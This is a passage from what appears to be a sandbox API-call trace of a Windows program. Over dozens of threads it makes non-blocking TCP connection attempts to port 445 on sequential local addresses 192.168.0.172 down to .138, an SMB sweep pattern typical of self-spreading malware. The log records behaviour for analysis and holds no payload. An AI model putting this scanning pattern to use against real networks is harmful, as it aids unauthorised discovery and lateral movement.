inet_addr (cp="192.168.0.172") returned 0xac00a8c0 [0097.416] htons (hostshort=0x1bd) returned 0xbd01 [0097.416] socket (af=2, type=1, protocol=6) returned 0x96c [0097.416] ioctlsocket (in: s=0x96c, cmd=-2147195266, argp=0xa68ff44 | out: argp=0xa68ff44) returned 0 [0097.416] connect (s=0x96c, name=0xa68ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.172"), namelen=16) returned -1 [0097.417] WSAGetLastError () returned 10035 [0097.417] select (nfds=0, readfds=0x0, writefds=0xa68fd18, exceptfds=0xa68fe20, timeout=0xa68ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 114 os_tid = 0xdd0 [0097.418] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20abb98 [0097.418] free (_Block=0x20abb98) [0097.418] inet_addr (cp="192.168.0.171") returned 0xab00a8c0 [0097.418] htons (hostshort=0x1bd) returned 0xbd01 [0097.418] socket (af=2, type=1, protocol=6) returned 0x978 [0097.418] ioctlsocket (in: s=0x978, cmd=-2147195266, argp=0xa7cff44 | out: argp=0xa7cff44) returned 0 [0097.418] connect (s=0x978, name=0xa7cff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.171"), namelen=16) returned -1 [0097.419] WSAGetLastError () returned 10035 [0097.419] select (nfds=0, readfds=0x0, writefds=0xa7cfd18, exceptfds=0xa7cfe20, timeout=0xa7cff3c*(tv_sec=10, tv_usec=0)) Thread: id = 115 os_tid = 0xdcc [0097.419] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20abb70 [0097.419] free (_Block=0x20abb70) [0097.419] inet_addr (cp="192.168.0.170") returned 0xaa00a8c0 [0097.419] htons (hostshort=0x1bd) returned 0xbd01 [0097.419] socket (af=2, type=1, protocol=6) returned 0x984 [0097.420] ioctlsocket (in: s=0x984, cmd=-2147195266, argp=0xa90ff44 | out: argp=0xa90ff44) returned 0 [0097.420] connect (s=0x984, name=0xa90ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.170"), namelen=16) returned -1 [0097.420] WSAGetLastError () returned 10035 [0097.420] select (nfds=0, readfds=0x0, writefds=0xa90fd18, exceptfds=0xa90fe20, timeout=0xa90ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 116 os_tid = 0xe3c [0097.421] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20abb48 [0097.421] free (_Block=0x20abb48) [0097.421] inet_addr (cp="192.168.0.169") returned 0xa900a8c0 [0097.421] htons (hostshort=0x1bd) returned 0xbd01 [0097.421] socket (af=2, type=1, protocol=6) returned 0x990 [0097.422] ioctlsocket (in: s=0x990, cmd=-2147195266, argp=0xaa4ff44 | out: argp=0xaa4ff44) returned 0 [0097.422] connect (s=0x990, name=0xaa4ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.169"), namelen=16) returned -1 [0097.422] WSAGetLastError () returned 10035 [0097.422] select (nfds=0, readfds=0x0, writefds=0xaa4fd18, exceptfds=0xaa4fe20, timeout=0xaa4ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 117 os_tid = 0xe44 [0097.423] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20abb20 [0097.423] free (_Block=0x20abb20) [0097.423] inet_addr (cp="192.168.0.168") returned 0xa800a8c0 [0097.423] htons (hostshort=0x1bd) returned 0xbd01 [0097.423] socket (af=2, type=1, protocol=6) returned 0x99c [0097.423] ioctlsocket (in: s=0x99c, cmd=-2147195266, argp=0xab8ff44 | out: argp=0xab8ff44) returned 0 [0097.423] connect (s=0x99c, name=0xab8ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.168"), namelen=16) returned -1 [0097.424] WSAGetLastError () returned 10035 [0097.424] select (nfds=0, readfds=0x0, writefds=0xab8fd18, exceptfds=0xab8fe20, timeout=0xab8ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 118 os_tid = 0xe54 [0097.424] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x20abaf8 [0097.424] free (_Block=0x20abaf8) [0097.424] inet_addr (cp="192.168.0.167") returned 0xa700a8c0 [0097.424] htons (hostshort=0x1bd) returned 0xbd01 [0097.424] socket (af=2, type=1, protocol=6) returned 0x9a8 [0097.426] ioctlsocket (in: s=0x9a8, cmd=-2147195266, argp=0xaccff44 | out: argp=0xaccff44) returned 0 [0097.426] connect (s=0x9a8, name=0xaccff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.167"), namelen=16) returned -1 [0097.426] WSAGetLastError () returned 10035 [0097.426] select (nfds=0, readfds=0x0, writefds=0xaccfd18, exceptfds=0xaccfe20, timeout=0xaccff3c*(tv_sec=10, tv_usec=0)) Thread: id = 119 os_tid = 0xe4c [0097.427] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3981c80 [0097.427] free (_Block=0x3981c80) [0097.427] inet_addr (cp="192.168.0.166") returned 0xa600a8c0 [0097.427] htons (hostshort=0x1bd) returned 0xbd01 [0097.427] socket (af=2, type=1, protocol=6) returned 0x9b4 [0097.428] ioctlsocket (in: s=0x9b4, cmd=-2147195266, argp=0xae0ff44 | out: argp=0xae0ff44) returned 0 [0097.428] connect (s=0x9b4, name=0xae0ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.166"), namelen=16) returned -1 [0097.429] WSAGetLastError () returned 10035 [0097.429] select (nfds=0, readfds=0x0, writefds=0xae0fd18, exceptfds=0xae0fe20, timeout=0xae0ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 120 os_tid = 0xe50 [0097.429] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3981c58 [0097.429] free (_Block=0x3981c58) [0097.429] inet_addr (cp="192.168.0.165") returned 0xa500a8c0 [0097.429] htons (hostshort=0x1bd) returned 0xbd01 [0097.429] socket (af=2, type=1, protocol=6) returned 0x9c0 [0097.430] ioctlsocket (in: s=0x9c0, cmd=-2147195266, argp=0xaf4ff44 | out: argp=0xaf4ff44) returned 0 [0097.430] connect (s=0x9c0, name=0xaf4ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.165"), namelen=16) returned -1 [0097.430] WSAGetLastError () returned 10035 [0097.430] select (nfds=0, readfds=0x0, writefds=0xaf4fd18, exceptfds=0xaf4fe20, timeout=0xaf4ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 121 os_tid = 0xe34 [0097.431] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3981c30 [0097.431] free (_Block=0x3981c30) [0097.431] inet_addr (cp="192.168.0.164") returned 0xa400a8c0 [0097.431] htons (hostshort=0x1bd) returned 0xbd01 [0097.431] socket (af=2, type=1, protocol=6) returned 0x9cc [0097.431] ioctlsocket (in: s=0x9cc, cmd=-2147195266, argp=0xb08ff44 | out: argp=0xb08ff44) returned 0 [0097.431] connect (s=0x9cc, name=0xb08ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.164"), namelen=16) returned -1 [0097.432] WSAGetLastError () returned 10035 [0097.432] select (nfds=0, readfds=0x0, writefds=0xb08fd18, exceptfds=0xb08fe20, timeout=0xb08ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 122 os_tid = 0xe48 [0097.432] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3981c08 [0097.432] free (_Block=0x3981c08) [0097.432] inet_addr (cp="192.168.0.163") returned 0xa300a8c0 [0097.432] htons (hostshort=0x1bd) returned 0xbd01 [0097.432] socket (af=2, type=1, protocol=6) returned 0x9d8 [0097.433] ioctlsocket (in: s=0x9d8, cmd=-2147195266, argp=0xb1cff44 | out: argp=0xb1cff44) returned 0 [0097.433] connect (s=0x9d8, name=0xb1cff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.163"), namelen=16) returned -1 [0097.433] WSAGetLastError () returned 10035 [0097.433] select (nfds=0, readfds=0x0, writefds=0xb1cfd18, exceptfds=0xb1cfe20, timeout=0xb1cff3c*(tv_sec=10, tv_usec=0)) Thread: id = 123 os_tid = 0xdfc [0097.434] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3981be0 [0097.434] free (_Block=0x3981be0) [0097.434] inet_addr (cp="192.168.0.162") returned 0xa200a8c0 [0097.434] htons (hostshort=0x1bd) returned 0xbd01 [0097.434] socket (af=2, type=1, protocol=6) returned 0x9e4 [0097.434] ioctlsocket (in: s=0x9e4, cmd=-2147195266, argp=0xb30ff44 | out: argp=0xb30ff44) returned 0 [0097.434] connect (s=0x9e4, name=0xb30ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.162"), namelen=16) returned -1 [0097.435] WSAGetLastError () returned 10035 [0097.435] select (nfds=0, readfds=0x0, writefds=0xb30fd18, exceptfds=0xb30fe20, timeout=0xb30ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 124 os_tid = 0xdf8 [0097.435] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3981bb8 [0097.435] free (_Block=0x3981bb8) [0097.435] inet_addr (cp="192.168.0.161") returned 0xa100a8c0 [0097.435] htons (hostshort=0x1bd) returned 0xbd01 [0097.435] socket (af=2, type=1, protocol=6) returned 0x9f0 [0097.436] ioctlsocket (in: s=0x9f0, cmd=-2147195266, argp=0xb44ff44 | out: argp=0xb44ff44) returned 0 [0097.436] connect (s=0x9f0, name=0xb44ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.161"), namelen=16) returned -1 [0097.436] WSAGetLastError () returned 10035 [0097.436] select (nfds=0, readfds=0x0, writefds=0xb44fd18, exceptfds=0xb44fe20, timeout=0xb44ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 125 os_tid = 0xe70 [0097.437] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3981b90 [0097.437] free (_Block=0x3981b90) [0097.437] inet_addr (cp="192.168.0.160") returned 0xa000a8c0 [0097.437] htons (hostshort=0x1bd) returned 0xbd01 [0097.437] socket (af=2, type=1, protocol=6) returned 0x9fc [0097.438] ioctlsocket (in: s=0x9fc, cmd=-2147195266, argp=0xb58ff44 | out: argp=0xb58ff44) returned 0 [0097.438] connect (s=0x9fc, name=0xb58ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.160"), namelen=16) returned -1 [0097.438] WSAGetLastError () returned 10035 [0097.438] select (nfds=0, readfds=0x0, writefds=0xb58fd18, exceptfds=0xb58fe20, timeout=0xb58ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 126 os_tid = 0xe68 [0097.439] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3981b68 [0097.439] free (_Block=0x3981b68) [0097.439] inet_addr (cp="192.168.0.159") returned 0x9f00a8c0 [0097.439] htons (hostshort=0x1bd) returned 0xbd01 [0097.439] socket (af=2, type=1, protocol=6) returned 0xa08 [0097.440] ioctlsocket (in: s=0xa08, cmd=-2147195266, argp=0xb6cff44 | out: argp=0xb6cff44) returned 0 [0097.440] connect (s=0xa08, name=0xb6cff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.159"), namelen=16) returned -1 [0097.441] WSAGetLastError () returned 10035 [0097.441] select (nfds=0, readfds=0x0, writefds=0xb6cfd18, exceptfds=0xb6cfe20, timeout=0xb6cff3c*(tv_sec=10, tv_usec=0)) Thread: id = 127 os_tid = 0xe6c [0097.441] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3981b40 [0097.441] free (_Block=0x3981b40) [0097.441] inet_addr (cp="192.168.0.158") returned 0x9e00a8c0 [0097.441] htons (hostshort=0x1bd) returned 0xbd01 [0097.441] socket (af=2, type=1, protocol=6) returned 0xa14 [0097.442] ioctlsocket (in: s=0xa14, cmd=-2147195266, argp=0xb80ff44 | out: argp=0xb80ff44) returned 0 [0097.442] connect (s=0xa14, name=0xb80ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.158"), namelen=16) returned -1 [0097.442] WSAGetLastError () returned 10035 [0097.442] select (nfds=0, readfds=0x0, writefds=0xb80fd18, exceptfds=0xb80fe20, timeout=0xb80ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 128 os_tid = 0xe60 [0097.443] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3981b18 [0097.443] free (_Block=0x3981b18) [0097.443] inet_addr (cp="192.168.0.157") returned 0x9d00a8c0 [0097.443] htons (hostshort=0x1bd) returned 0xbd01 [0097.443] socket (af=2, type=1, protocol=6) returned 0xa20 [0097.443] ioctlsocket (in: s=0xa20, cmd=-2147195266, argp=0xb94ff44 | out: argp=0xb94ff44) returned 0 [0097.443] connect (s=0xa20, name=0xb94ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.157"), namelen=16) returned -1 [0097.444] WSAGetLastError () returned 10035 [0097.444] select (nfds=0, readfds=0x0, writefds=0xb94fd18, exceptfds=0xb94fe20, timeout=0xb94ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 129 os_tid = 0xe64 [0097.444] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3981af0 [0097.444] free (_Block=0x3981af0) [0097.444] inet_addr (cp="192.168.0.156") returned 0x9c00a8c0 [0097.444] htons (hostshort=0x1bd) returned 0xbd01 [0097.444] socket (af=2, type=1, protocol=6) returned 0xa2c [0097.445] ioctlsocket (in: s=0xa2c, cmd=-2147195266, argp=0xba8ff44 | out: argp=0xba8ff44) returned 0 [0097.445] connect (s=0xa2c, name=0xba8ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.156"), namelen=16) returned -1 [0097.445] WSAGetLastError () returned 10035 [0097.445] select (nfds=0, readfds=0x0, writefds=0xba8fd18, exceptfds=0xba8fe20, timeout=0xba8ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 130 os_tid = 0xe5c [0097.446] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3981ac8 [0097.446] free (_Block=0x3981ac8) [0097.446] inet_addr (cp="192.168.0.155") returned 0x9b00a8c0 [0097.446] htons (hostshort=0x1bd) returned 0xbd01 [0097.446] socket (af=2, type=1, protocol=6) returned 0xa38 [0097.446] ioctlsocket (in: s=0xa38, cmd=-2147195266, argp=0xbbcff44 | out: argp=0xbbcff44) returned 0 [0097.446] connect (s=0xa38, name=0xbbcff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.155"), namelen=16) returned -1 [0097.447] WSAGetLastError () returned 10035 [0097.447] select (nfds=0, readfds=0x0, writefds=0xbbcfd18, exceptfds=0xbbcfe20, timeout=0xbbcff3c*(tv_sec=10, tv_usec=0)) Thread: id = 131 os_tid = 0xe58 [0097.661] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3981aa0 [0097.661] free (_Block=0x3981aa0) [0097.661] inet_addr (cp="192.168.0.154") returned 0x9a00a8c0 [0097.661] htons (hostshort=0x1bd) returned 0xbd01 [0097.661] socket (af=2, type=1, protocol=6) returned 0xac8 [0097.661] ioctlsocket (in: s=0xac8, cmd=-2147195266, argp=0xbd0ff44 | out: argp=0xbd0ff44) returned 0 [0097.661] connect (s=0xac8, name=0xbd0ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.154"), namelen=16) returned -1 [0097.663] WSAGetLastError () returned 10035 [0097.663] select (nfds=0, readfds=0x0, writefds=0xbd0fd18, exceptfds=0xbd0fe20, timeout=0xbd0ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 132 os_tid = 0xe84 Thread: id = 133 os_tid = 0xe88 [0097.663] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3981a78 [0097.663] free (_Block=0x3981a78) [0097.663] inet_addr (cp="192.168.0.153") returned 0x9900a8c0 [0097.663] htons (hostshort=0x1bd) returned 0xbd01 [0097.663] socket (af=2, type=1, protocol=6) returned 0xad4 [0097.663] ioctlsocket (in: s=0xad4, cmd=-2147195266, argp=0xbf8ff44 | out: argp=0xbf8ff44) returned 0 [0097.663] connect (s=0xad4, name=0xbf8ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.153"), namelen=16) returned -1 [0097.664] WSAGetLastError () returned 10035 [0097.664] select (nfds=0, readfds=0x0, writefds=0xbf8fd18, exceptfds=0xbf8fe20, timeout=0xbf8ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 134 os_tid = 0xe7c [0097.665] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3981a50 [0097.665] free (_Block=0x3981a50) [0097.665] inet_addr (cp="192.168.0.152") returned 0x9800a8c0 [0097.665] htons (hostshort=0x1bd) returned 0xbd01 [0097.665] socket (af=2, type=1, protocol=6) returned 0xae0 [0097.665] ioctlsocket (in: s=0xae0, cmd=-2147195266, argp=0xc0cff44 | out: argp=0xc0cff44) returned 0 [0097.665] connect (s=0xae0, name=0xc0cff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.152"), namelen=16) returned -1 [0097.665] WSAGetLastError () returned 10035 [0097.666] select (nfds=0, readfds=0x0, writefds=0xc0cfd18, exceptfds=0xc0cfe20, timeout=0xc0cff3c*(tv_sec=10, tv_usec=0)) Thread: id = 135 os_tid = 0xe80 [0097.666] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3981a28 [0097.666] free (_Block=0x3981a28) [0097.666] inet_addr (cp="192.168.0.151") returned 0x9700a8c0 [0097.666] htons (hostshort=0x1bd) returned 0xbd01 [0097.666] socket (af=2, type=1, protocol=6) returned 0xaec [0097.666] ioctlsocket (in: s=0xaec, cmd=-2147195266, argp=0xc20ff44 | out: argp=0xc20ff44) returned 0 [0097.666] connect (s=0xaec, name=0xc20ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.151"), namelen=16) returned -1 [0097.667] WSAGetLastError () returned 10035 [0097.667] select (nfds=0, readfds=0x0, writefds=0xc20fd18, exceptfds=0xc20fe20, timeout=0xc20ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 136 os_tid = 0xe78 [0097.669] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3981a00 [0097.669] free (_Block=0x3981a00) [0097.669] inet_addr (cp="192.168.0.150") returned 0x9600a8c0 [0097.669] htons (hostshort=0x1bd) returned 0xbd01 [0097.669] socket (af=2, type=1, protocol=6) returned 0xaf8 [0097.669] ioctlsocket (in: s=0xaf8, cmd=-2147195266, argp=0xc34ff44 | out: argp=0xc34ff44) returned 0 [0097.669] connect (s=0xaf8, name=0xc34ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.150"), namelen=16) returned -1 [0097.670] WSAGetLastError () returned 10035 [0097.670] select (nfds=0, readfds=0x0, writefds=0xc34fd18, exceptfds=0xc34fe20, timeout=0xc34ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 137 os_tid = 0xe74 [0097.670] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x39819d8 [0097.670] free (_Block=0x39819d8) [0097.670] inet_addr (cp="192.168.0.149") returned 0x9500a8c0 [0097.670] htons (hostshort=0x1bd) returned 0xbd01 [0097.670] socket (af=2, type=1, protocol=6) returned 0xb04 [0097.671] ioctlsocket (in: s=0xb04, cmd=-2147195266, argp=0xc48ff44 | out: argp=0xc48ff44) returned 0 [0097.671] connect (s=0xb04, name=0xc48ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.149"), namelen=16) returned -1 [0097.671] WSAGetLastError () returned 10035 [0097.671] select (nfds=0, readfds=0x0, writefds=0xc48fd18, exceptfds=0xc48fe20, timeout=0xc48ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 138 os_tid = 0xe94 [0097.672] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x39819b0 [0097.672] free (_Block=0x39819b0) [0097.672] inet_addr (cp="192.168.0.148") returned 0x9400a8c0 [0097.672] htons (hostshort=0x1bd) returned 0xbd01 [0097.672] socket (af=2, type=1, protocol=6) returned 0xb10 [0097.672] ioctlsocket (in: s=0xb10, cmd=-2147195266, argp=0xc5cff44 | out: argp=0xc5cff44) returned 0 [0097.672] connect (s=0xb10, name=0xc5cff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.148"), namelen=16) returned -1 [0097.674] WSAGetLastError () returned 10035 [0097.674] select (nfds=0, readfds=0x0, writefds=0xc5cfd18, exceptfds=0xc5cfe20, timeout=0xc5cff3c*(tv_sec=10, tv_usec=0)) Thread: id = 139 os_tid = 0xcfc [0097.674] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3981988 [0097.674] free (_Block=0x3981988) [0097.674] inet_addr (cp="192.168.0.147") returned 0x9300a8c0 [0097.674] htons (hostshort=0x1bd) returned 0xbd01 [0097.674] socket (af=2, type=1, protocol=6) returned 0xb1c [0097.675] ioctlsocket (in: s=0xb1c, cmd=-2147195266, argp=0xc70ff44 | out: argp=0xc70ff44) returned 0 [0097.675] connect (s=0xb1c, name=0xc70ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.147"), namelen=16) returned -1 [0097.675] WSAGetLastError () returned 10035 [0097.675] select (nfds=0, readfds=0x0, writefds=0xc70fd18, exceptfds=0xc70fe20, timeout=0xc70ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 140 os_tid = 0x740 [0097.676] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3981960 [0097.676] free (_Block=0x3981960) [0097.676] inet_addr (cp="192.168.0.146") returned 0x9200a8c0 [0097.676] htons (hostshort=0x1bd) returned 0xbd01 [0097.676] socket (af=2, type=1, protocol=6) returned 0xb28 [0097.678] ioctlsocket (in: s=0xb28, cmd=-2147195266, argp=0xc84ff44 | out: argp=0xc84ff44) returned 0 [0097.678] connect (s=0xb28, name=0xc84ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.146"), namelen=16) returned -1 [0097.678] WSAGetLastError () returned 10035 [0097.678] select (nfds=0, readfds=0x0, writefds=0xc84fd18, exceptfds=0xc84fe20, timeout=0xc84ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 141 os_tid = 0x3ac [0097.679] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3981938 [0097.679] free (_Block=0x3981938) [0097.679] inet_addr (cp="192.168.0.145") returned 0x9100a8c0 [0097.679] htons (hostshort=0x1bd) returned 0xbd01 [0097.679] socket (af=2, type=1, protocol=6) returned 0xb34 [0097.679] ioctlsocket (in: s=0xb34, cmd=-2147195266, argp=0xc98ff44 | out: argp=0xc98ff44) returned 0 [0097.679] connect (s=0xb34, name=0xc98ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.145"), namelen=16) returned -1 [0097.680] WSAGetLastError () returned 10035 [0097.680] select (nfds=0, readfds=0x0, writefds=0xc98fd18, exceptfds=0xc98fe20, timeout=0xc98ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 142 os_tid = 0xc0 [0097.680] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3981910 [0097.680] free (_Block=0x3981910) [0097.680] inet_addr (cp="192.168.0.144") returned 0x9000a8c0 [0097.680] htons (hostshort=0x1bd) returned 0xbd01 [0097.680] socket (af=2, type=1, protocol=6) returned 0xb40 [0097.681] ioctlsocket (in: s=0xb40, cmd=-2147195266, argp=0xcacff44 | out: argp=0xcacff44) returned 0 [0097.681] connect (s=0xb40, name=0xcacff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.144"), namelen=16) returned -1 [0097.682] WSAGetLastError () returned 10035 [0097.682] select (nfds=0, readfds=0x0, writefds=0xcacfd18, exceptfds=0xcacfe20, timeout=0xcacff3c*(tv_sec=10, tv_usec=0)) Thread: id = 143 os_tid = 0x914 [0097.682] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x39818e8 [0097.682] free (_Block=0x39818e8) [0097.682] inet_addr (cp="192.168.0.143") returned 0x8f00a8c0 [0097.682] htons (hostshort=0x1bd) returned 0xbd01 [0097.682] socket (af=2, type=1, protocol=6) returned 0xb4c [0097.683] ioctlsocket (in: s=0xb4c, cmd=-2147195266, argp=0xcc0ff44 | out: argp=0xcc0ff44) returned 0 [0097.683] connect (s=0xb4c, name=0xcc0ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.143"), namelen=16) returned -1 [0097.683] WSAGetLastError () returned 10035 [0097.683] select (nfds=0, readfds=0x0, writefds=0xcc0fd18, exceptfds=0xcc0fe20, timeout=0xcc0ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 144 os_tid = 0x918 [0097.684] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x39818c0 [0097.684] free (_Block=0x39818c0) [0097.684] inet_addr (cp="192.168.0.142") returned 0x8e00a8c0 [0097.684] htons (hostshort=0x1bd) returned 0xbd01 [0097.684] socket (af=2, type=1, protocol=6) returned 0xb58 [0097.685] ioctlsocket (in: s=0xb58, cmd=-2147195266, argp=0xcd4ff44 | out: argp=0xcd4ff44) returned 0 [0097.685] connect (s=0xb58, name=0xcd4ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.142"), namelen=16) returned -1 [0097.686] WSAGetLastError () returned 10035 [0097.686] select (nfds=0, readfds=0x0, writefds=0xcd4fd18, exceptfds=0xcd4fe20, timeout=0xcd4ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 145 os_tid = 0x91c [0097.686] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3981898 [0097.687] free (_Block=0x3981898) [0097.687] inet_addr (cp="192.168.0.141") returned 0x8d00a8c0 [0097.687] htons (hostshort=0x1bd) returned 0xbd01 [0097.687] socket (af=2, type=1, protocol=6) returned 0xb64 [0097.687] ioctlsocket (in: s=0xb64, cmd=-2147195266, argp=0xce8ff44 | out: argp=0xce8ff44) returned 0 [0097.687] connect (s=0xb64, name=0xce8ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.141"), namelen=16) returned -1 [0097.688] WSAGetLastError () returned 10035 [0097.688] select (nfds=0, readfds=0x0, writefds=0xce8fd18, exceptfds=0xce8fe20, timeout=0xce8ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 146 os_tid = 0x920 [0097.688] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3981870 [0097.688] free (_Block=0x3981870) [0097.688] inet_addr (cp="192.168.0.140") returned 0x8c00a8c0 [0097.688] htons (hostshort=0x1bd) returned 0xbd01 [0097.688] socket (af=2, type=1, protocol=6) returned 0xb70 [0097.689] ioctlsocket (in: s=0xb70, cmd=-2147195266, argp=0xcfcff44 | out: argp=0xcfcff44) returned 0 [0097.689] connect (s=0xb70, name=0xcfcff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.140"), namelen=16) returned -1 [0097.689] WSAGetLastError () returned 10035 [0097.689] select (nfds=0, readfds=0x0, writefds=0xcfcfd18, exceptfds=0xcfcfe20, timeout=0xcfcff3c*(tv_sec=10, tv_usec=0)) Thread: id = 147 os_tid = 0x924 [0097.690] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3981848 [0097.690] free (_Block=0x3981848) [0097.690] inet_addr (cp="192.168.0.139") returned 0x8b00a8c0 [0097.690] htons (hostshort=0x1bd) returned 0xbd01 [0097.690] socket (af=2, type=1, protocol=6) returned 0xb7c [0097.690] ioctlsocket (in: s=0xb7c, cmd=-2147195266, argp=0xd10ff44 | out: argp=0xd10ff44) returned 0 [0097.690] connect (s=0xb7c, name=0xd10ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.139"), namelen=16) returned -1 [0097.691] WSAGetLastError () returned 10035 [0097.691] select (nfds=0, readfds=0x0, writefds=0xd10fd18, exceptfds=0xd10fe20, timeout=0xd10ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 148 os_tid = 0x928 [0097.691] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3981820 [0097.691] free (_Block=0x3981820) [0097.691] inet_addr (cp="192.168.0.138") returned 0x8a00a8c0 [0097.691] htons (hostshort=0x1bd) returned 0xbd01 [0097.691] socket (af=2, type=1, protocol=6) returned 0xb88 [0097.693] ioctlsocket (in: s=0xb88, cmd=-2147195266, argp=0xd24ff44 | out: argp=0xd24ff44) returned 0 [0097.693] connect (s=0xb88, name=0xd24ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.138"), namelen=16) returned -1 